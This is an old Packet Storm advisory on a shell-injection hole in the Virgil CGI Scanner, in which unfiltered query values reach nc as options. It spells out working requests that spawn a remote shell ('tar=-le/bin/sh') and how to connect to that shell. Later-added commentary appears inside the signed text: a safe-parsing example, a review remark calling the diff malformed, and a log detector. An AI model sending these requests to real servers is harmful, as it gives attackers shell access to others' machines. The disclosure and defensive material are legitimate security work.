virgil.txt

2002-10-25T00:00:00
ID PACKETSTORM:29938
Type packetstorm
Reporter KALIF research group
Modified 2002-10-25T00:00:00

Description

-----BEGIN PGP SIGNED MESSAGE-----  
  
- - --------------------------------------------------------------------------  
KALIF research group kalif@hushmail.com  
October 21st, 2002 Joschka Fischer  
- - --------------------------------------------------------------------------  
  
- - Overview  
  
Software : Virgil CGI Scanner 0.9  
Programmer : Marc Ruef <marc.ruef@computec.ch>  
Vulnerability : Privilege Escalation  
Status : Author has been notified  
Type : remote  
  
- - Issue  
  
Joschka Fischer discovered a security hole in the CGI vulnerability scanner  
'Virgil' by Marc Ruef [1]! By sending a specially crafted request one is able  
to spawn a remote shell with the privileges of the running CGI script.  
  
Depending on the server configuration, this is either the owner of the script (suEXEC)  
or the user the HTTP daemon runs as (usually nobody).  
  
- - Problem Description  
  
Virgil CGI Scanner by Marc Ruef is a simple Bash script which offers an  
interface to start CGI security audits against remote hosts. The author states  
that his software represents the first free online CGI scanner and uses a  
very effective and fast technique to determine vulnerabilities.  
  
Marc Ruef - a self-proclaimed security expert - recently received fame by posting  
various announcements to well-known security mailing lists and by writing a  
German book called "Hacking Intern" which deals with common security techniques and  
has been released by a German gossip publishing house [2].  
  
To get the Virgil CGI Scanner look at:  
http://www.computec.ch/software/webserver/virgil_cgi_scanner/virgil-0.9.tar.gz  
MD5SUM: fe098b68c0de04cb0200f2db324ab10b  
  
For a running version visit:  
http://scanner.computec.ch/cgi-bin/virgil/virgil.cgi  
  
- - Technical Description  
  
The following vulnerable line is present in Virgil CGI Scanner v. 0.9:  
  
BANNER=`echo -e "HEAD / HTTP/1.0\n\n" |nc -w 10 $TARGET $ZIELPORT`  
  
Here, both variables are user-supplied:  
  
TARGET=`echo $QUERY_STRING | awk 'BEGIN{FS="&"}{print $1}' |sed s/"tar="//`  
ZIELPORT=`echo $QUERY_STRING | awk 'BEGIN{FS="&"}{print $2}' |sed s/"zielport="// |sed "s/-//g"`  
  
There are, however, a few restrictions, namely:  
- $QUERY_STRING is not URL-decoded, i.e. %20 for example is not replaced with ' '  
- In $ZIELPORT the dash ('-') is filtered out  
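The root cause above is that both values are cut out of $QUERY_STRING by position and handed to nc as positional arguments, so a value beginning with '-' is parsed by nc as an option. The following is an added example (not Virgil's own code) of how the same two parameters can be parsed safely in POSIX sh: each parameter is looked up by name, the target is restricted to hostname characters and may not begin with '-' or '.', the port must be a decimal number in 1..65535, and nc is only ever called with the options fixed in front of the validated values. Because the advisory notes that the script never URL-decodes the query string, the whitelist simply excludes '%'; if a decoder were added, the same checks would have to run on the decoded value. The function names (query_param, valid_target, valid_port, parse_query, banner_for) are mine.

```shell
#!/bin/sh
# Added example, not part of Virgil: strict handling of the tar= and zielport=
# CGI parameters before anything reaches nc's argument list.

# Print the value of parameter $2 from query string $1 (empty if absent).
# Looking the field up by name means reordering or extra '&' fields cannot
# shift a different value into the wrong variable.
query_param() {
    printf '%s\n' "$1" | tr '&' '\n' | sed -n "s/^$2=//p" | sed -n '1p'
}

# Accept only hostnames or IPv4 literals: letters, digits, dots and dashes,
# never starting with '-' (an nc option) or '.', at most 253 characters.
# '%' is deliberately not allowed: the raw, undecoded query string would
# otherwise be able to carry an encoded dash.
valid_target() {
    case "$1" in
        '' | -* | .* ) return 1 ;;
    esac
    [ "${#1}" -le 253 ] || return 1
    printf '%s\n' "$1" | grep -Eq '^[A-Za-z0-9][A-Za-z0-9.-]*$'
}

# Accept only a decimal port number in 1..65535 (no dashes, no ranges).
valid_port() {
    printf '%s\n' "$1" | grep -Eq '^[0-9]{1,5}$' || return 1
    [ "$1" -ge 1 ] && [ "$1" -le 65535 ]
}

# Parse a query string ($1). On success print "target port" and return 0;
# otherwise print nothing and return 1.
parse_query() {
    target=$(query_param "$1" tar)
    port=$(query_param "$1" zielport)
    valid_target "$target" || return 1
    valid_port "$port" || return 1
    printf '%s %s\n' "$target" "$port"
}

# Banner grab as Virgil does it, but only with values that passed parse_query.
# The nc options come first and the validated values last, so nc can never
# read user input as an option.
banner_for() {
    parsed=$(parse_query "$1") || {
        printf 'Status: 400 Bad Request\r\n\r\ninvalid parameters\n'
        return 1
    }
    target=${parsed% *}
    port=${parsed#* }
    printf 'HEAD / HTTP/1.0\r\n\r\n' | nc -w 10 "$target" "$port"
}

# Demonstration on constructed input (no network access is needed for these).
parse_query 'tar=www.example.com&zielport=80'
parse_query 'tar=-lp&zielport=31337' || echo "rejected: tar=-lp&zielport=31337"
```

Running the block prints `www.example.com 80` for the well-formed query and the "rejected" line for the probe request from this advisory; banner_for is the only function that touches nc and is not exercised here.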
  
To test whether the script is vulnerable, use the following request and then telnet to  
the given port number (e.g. 31337):  
  
/cgi-bin/virgil.cgi?tar=-lp&zielport=31337  
  
Exploitation is very straightforward as long as nc supports the -e option:  
  
'/cgi-bin/virgil.cgi?tar=-le/bin/sh' spawns a remote shell on a port for  
exactly 10 seconds ("-w 10")! To connect to this shell execute `nc -v TARGET.COM 1030-6000`  
while constantly requesting the URI mentioned above.  
  
- - Workaround / Patch  
  
We are currently not aware of any patch, but we suggest that you update your Virgil  
Vulnerable CGI-Script Database accordingly:  
  
*** apache.db.old Sun Oct 23 23:05:05 1983  
--- apache.db Sun Oct 23 23:05:05 1985  
***************  
*** 1,3 ****  
--- 1,5 ----  
+ cgi-bin/virgil.cgi?tar=-lp&zielport=31337  
+ cgi-bin/virgil/virgil.cgi?tar=-lp&zielport=31337  
cgi-bin/a1disp3.cgi?/../../../../../../etc/passwd  
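Review bot: the hunk is not applicable as written: the old-side section `*** 1,3 ****` is empty and the new-side header `--- 1,5 ----` declares five lines, but only three follow it (two `+` lines and one context line), so `patch` will reject it; regenerate it with `diff -c apache.db.old apache.db` (the 1983/1985 timestamps also read as placeholders). Note also that these two entries are only a detection signature for other Virgil installations, keyed on the exact probe `tar=-lp&zielport=31337`; they do not fix the script itself, which still needs to reject `tar=` and `zielport=` values beginning with '-' before they reach nc.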
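Until the script is fixed, a site running Virgil can at least spot attempts from its web server logs. The following is an added example (not part of this advisory or of Virgil) of a small detector over Apache access-log lines: it flags every request to virgil.cgi whose tar= or zielport= value starts with an option dash, written either raw or percent-encoded (%2d), which is the form both request variants in this advisory take. The log lines are constructed and the function names (flag_virgil_requests, count_flagged) are mine.

```shell
#!/bin/sh
# Added example: flag access-log requests that try to smuggle nc options
# through Virgil's tar= / zielport= parameters. All log lines are constructed.

# Constructed sample in Apache combined log format: two legitimate scans and
# the two request forms from the advisory (one of them percent-encoded).
SAMPLE_LOG='10.0.0.5 - - [21/Oct/2002:10:00:01 +0200] "GET /cgi-bin/virgil.cgi?tar=www.example.com&zielport=80 HTTP/1.0" 200 512 "-" "Mozilla/4.0"
10.0.0.9 - - [21/Oct/2002:10:00:07 +0200] "GET /cgi-bin/virgil.cgi?tar=-lp&zielport=31337 HTTP/1.0" 200 0 "-" "-"
10.0.0.9 - - [21/Oct/2002:10:00:08 +0200] "GET /cgi-bin/virgil/virgil.cgi?tar=%2Dle/bin/sh HTTP/1.0" 200 0 "-" "-"
10.0.0.7 - - [21/Oct/2002:10:00:09 +0200] "GET /cgi-bin/virgil.cgi?tar=host.example.net&zielport=8080 HTTP/1.0" 200 512 "-" "curl/7.9"'

# Print every line (read from stdin) whose virgil.cgi request carries a tar=
# or zielport= value starting with '-' or with its encoded form '%2d'.
# The optional group skips over earlier parameters so that the dangerous
# parameter is matched wherever it appears in the query string; -i makes the
# match case-insensitive so %2D is caught as well.
flag_virgil_requests() {
    grep -Ei 'virgil\.cgi[?]([^" ]*&)?(tar|zielport)=(-|%2d)'
}

# Number of flagged lines for a log passed on stdin.
count_flagged() {
    flag_virgil_requests | wc -l | tr -d ' '
}

# Demonstration on the constructed sample: prints the two suspicious lines.
printf '%s\n' "$SAMPLE_LOG" | flag_virgil_requests
```

Pipe a real access_log into flag_virgil_requests (for example `flag_virgil_requests < /var/log/apache/access_log`) to list the suspicious requests together with the requesting address; the legitimate scans in the sample are not reported because their values start with a hostname character.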
  
- - References / Greets  
  
[1] http://www.computec.ch  
[2] http://www.amazon.de/exec/obidos/ASIN/381582284X  
  
Pengo for elite VMS security  
Nung at the CCC-Congress, next time I will ask for coffee.  
  
  
  
-----BEGIN PGP SIGNATURE-----  
Version: Hush 2.2 (Java)  
Note: This signature can be verified at https://www.hushtools.com/verify  
  
wloEARECABoFAj21nuYTHGthbGlmQGh1c2htYWlsLmNvbQAKCRBfQx1m9p9BTXGvAJwL  
bceg643rTUH1HXtJFbvmNqAd7gCgsKHGY9J6tFCj/DeB7RYEmrix0q8=  
=nBCM  
-----END PGP SIGNATURE-----  